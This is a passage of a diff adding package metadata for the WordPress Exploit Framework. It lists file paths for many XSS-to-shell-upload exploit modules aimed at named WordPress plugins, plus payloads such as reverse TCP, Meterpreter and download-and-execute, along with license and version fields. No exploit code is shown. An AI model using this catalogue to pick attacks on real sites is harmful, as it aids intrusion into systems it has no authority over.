- lib/wpxf/modules/exploit/xss/reflected/trust_form_reflected_xss_shell_upload.rb
|
585
|
+
- lib/wpxf/modules/exploit/xss/reflected/twitter_plugin_reflected_xss_shell_upload.rb
|
586
|
+
- lib/wpxf/modules/exploit/xss/reflected/ultimate_csv_importer_reflected_xss_shell_upload.rb
|
587
|
+
- lib/wpxf/modules/exploit/xss/reflected/ultimate_form_builder_lite_reflected_xss_shell_upload.rb
|
588
|
+
- lib/wpxf/modules/exploit/xss/reflected/updater_reflected_xss_shell_upload.rb
|
589
|
+
- lib/wpxf/modules/exploit/xss/reflected/user_access_manager_reflected_xss_shell_upload.rb
|
590
|
+
- lib/wpxf/modules/exploit/xss/reflected/user_login_history_xss_shell_upload.rb
|
591
|
+
- lib/wpxf/modules/exploit/xss/reflected/user_role_reflected_xss_shell_upload.rb
|
592
|
+
- lib/wpxf/modules/exploit/xss/reflected/visitors_online_reflected_xss_shell_upload.rb
|
593
|
+
- lib/wpxf/modules/exploit/xss/reflected/w3_total_cache_reflected_xss_shell_upload.rb
|
594
|
+
- lib/wpxf/modules/exploit/xss/reflected/wang_guard_reflected_xss_shell_upload.rb
|
595
|
+
- lib/wpxf/modules/exploit/xss/reflected/whizz_reflected_xss_shell_upload.rb
|
596
|
+
- lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb
|
597
|
+
- lib/wpxf/modules/exploit/xss/reflected/wordpress_firewall_reflected_xss_shell_upload.rb
|
598
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_advanced_importer_reflected_xss_shell_upload.rb
|
599
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_filebase_download_manager_reflected_xss_shell_upload.rb
|
600
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_live_chat_support_reflected_xss_shell_upload.rb
|
601
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_mailster_reflected_xss_shell_upload.rb
|
602
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_members_reflected_xss_shell_upload.rb
|
603
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_retina_2x_xss_shell_upload.rb
|
604
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_statistics_12.0.9_reflected_xss_shell_upload.rb
|
605
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_statistics_reflected_xss_shell_upload.rb
|
606
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_v4.4_xss_shell_upload.rb
|
607
|
+
- lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb
|
608
|
+
- lib/wpxf/modules/exploit/xss/reflected/wpsolr_reflected_xss_shell_upload.rb
|
609
|
+
- lib/wpxf/modules/exploit/xss/reflected/yoast_seo_xss_shell_upload.rb
|
610
|
+
- lib/wpxf/modules/exploit/xss/reflected/zurl_preview_xss_shell_upload.rb
|
611
|
+
- lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb
|
612
|
+
- lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb
|
613
|
+
- lib/wpxf/modules/exploit/xss/stored/alo_easymail_csrf_xss_shell_upload.rb
|
614
|
+
- lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb
|
615
|
+
- lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb
|
616
|
+
- lib/wpxf/modules/exploit/xss/stored/caldera_forms_stored_xss_shell_upload.rb
|
617
|
+
- lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb
|
618
|
+
- lib/wpxf/modules/exploit/xss/stored/dw_question_answer_stored_xss_shell_upload.rb
|
619
|
+
- lib/wpxf/modules/exploit/xss/stored/dwnldr_xss_shell_upload.rb
|
620
|
+
- lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb
|
621
|
+
- lib/wpxf/modules/exploit/xss/stored/flickr_rss_csrf_xss_shell_upload.rb
|
622
|
+
- lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb
|
623
|
+
- lib/wpxf/modules/exploit/xss/stored/gwolle_guestbook_stored_xss_shell_upload.rb
|
624
|
+
- lib/wpxf/modules/exploit/xss/stored/imageinject_csrf_xss_shell_upload.rb
|
625
|
+
- lib/wpxf/modules/exploit/xss/stored/instagram_feed_csrf_stored_xss_shell_upload.rb
|
626
|
+
- lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb
|
627
|
+
- lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb
|
628
|
+
- lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb
|
629
|
+
- lib/wpxf/modules/exploit/xss/stored/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb
|
630
|
+
- lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb
|
631
|
+
- lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb
|
632
|
+
- lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb
|
633
|
+
- lib/wpxf/modules/exploit/xss/stored/social_media_widget_csrf_xss_shell_upload.rb
|
634
|
+
- lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb
|
635
|
+
- lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb
|
636
|
+
- lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb
|
637
|
+
- lib/wpxf/modules/exploit/xss/stored/universal_analytics_authenticated_xss_shell_upload.rb
|
638
|
+
- lib/wpxf/modules/exploit/xss/stored/user_login_log_authenticated_stored_xss_shell_upload.rb
|
639
|
+
- lib/wpxf/modules/exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload.rb
|
640
|
+
- lib/wpxf/modules/exploit/xss/stored/wp_google_maps_stored_xss_shell_upload.rb
|
641
|
+
- lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb
|
642
|
+
- lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb
|
643
|
+
- lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb
|
644
|
+
- lib/wpxf/net.rb
|
645
|
+
- lib/wpxf/net/cookie_jar.rb
|
646
|
+
- lib/wpxf/net/http_client.rb
|
647
|
+
- lib/wpxf/net/http_options.rb
|
648
|
+
- lib/wpxf/net/http_response.rb
|
649
|
+
- lib/wpxf/net/http_server.rb
|
650
|
+
- lib/wpxf/net/typhoeus_helper.rb
|
651
|
+
- lib/wpxf/net/user_agent.rb
|
652
|
+
- lib/wpxf/payloads/bind_php.rb
|
653
|
+
- lib/wpxf/payloads/custom.rb
|
654
|
+
- lib/wpxf/payloads/download_exec.rb
|
655
|
+
- lib/wpxf/payloads/exec.rb
|
656
|
+
- lib/wpxf/payloads/meterpreter_bind_tcp.rb
|
657
|
+
- lib/wpxf/payloads/meterpreter_reverse_tcp.rb
|
658
|
+
- lib/wpxf/payloads/reverse_tcp.rb
|
659
|
+
- lib/wpxf/payloads/socket_helper.rb
|
660
|
+
- lib/wpxf/utility.rb
|
661
|
+
- lib/wpxf/utility/body_builder.rb
|
662
|
+
- lib/wpxf/utility/reference_inflater.rb
|
663
|
+
- lib/wpxf/utility/text.rb
|
664
|
+
- lib/wpxf/versioning.rb
|
665
|
+
- lib/wpxf/versioning/browser_versions.rb
|
666
|
+
- lib/wpxf/versioning/os_versions.rb
|
667
|
+
- lib/wpxf/wordpress.rb
|
668
|
+
- lib/wpxf/wordpress/comments.rb
|
669
|
+
- lib/wpxf/wordpress/file_download.rb
|
670
|
+
- lib/wpxf/wordpress/fingerprint.rb
|
671
|
+
- lib/wpxf/wordpress/hash_dump.rb
|
672
|
+
- lib/wpxf/wordpress/login.rb
|
673
|
+
- lib/wpxf/wordpress/options.rb
|
674
|
+
- lib/wpxf/wordpress/plugin.rb
|
675
|
+
- lib/wpxf/wordpress/posts.rb
|
676
|
+
- lib/wpxf/wordpress/reflected_xss.rb
|
677
|
+
- lib/wpxf/wordpress/shell_upload.rb
|
678
|
+
- lib/wpxf/wordpress/staged_reflected_xss.rb
|
679
|
+
- lib/wpxf/wordpress/stored_xss.rb
|
680
|
+
- lib/wpxf/wordpress/urls.rb
|
681
|
+
- lib/wpxf/wordpress/user.rb
|
682
|
+
- lib/wpxf/wordpress/xss.rb
|
683
|
+
- wpxf.gemspec
|
684
|
+
homepage: https://github.com/rastating/wordpress-exploit-framework
|
685
|
+
licenses:
|
686
|
+
- GPL-3.0
|
687
|
+
metadata: {}
|
688
|
+
post_install_message:
|
689
|
+
rdoc_options: []
|
690
|
+
require_paths:
|
691
|
+
- lib
|
692
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
693
|
+
requirements:
|
694
|
+
- - ">="
|
695
|
+
- !ruby/object:Gem::Version
|
696
|
+
version: 2.4.4
|
697
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
698
|
+
requirements:
|
699
|
+
- - ">"
|
700
|
+
- !ruby/object:Gem::Version
|
701
|
+
version: 1.3.1
|
702
|
+
requirements: []
|
703
|
+
rubyforge_project:
|
704
|
+
rubygems_version: 2.7.6
|
705
|
+
signing_key:
|
706
|
+
specification_version: 4
|
707
|
+
summary: WordPress Exploit Framework
|
708
|
+
test_files: []
|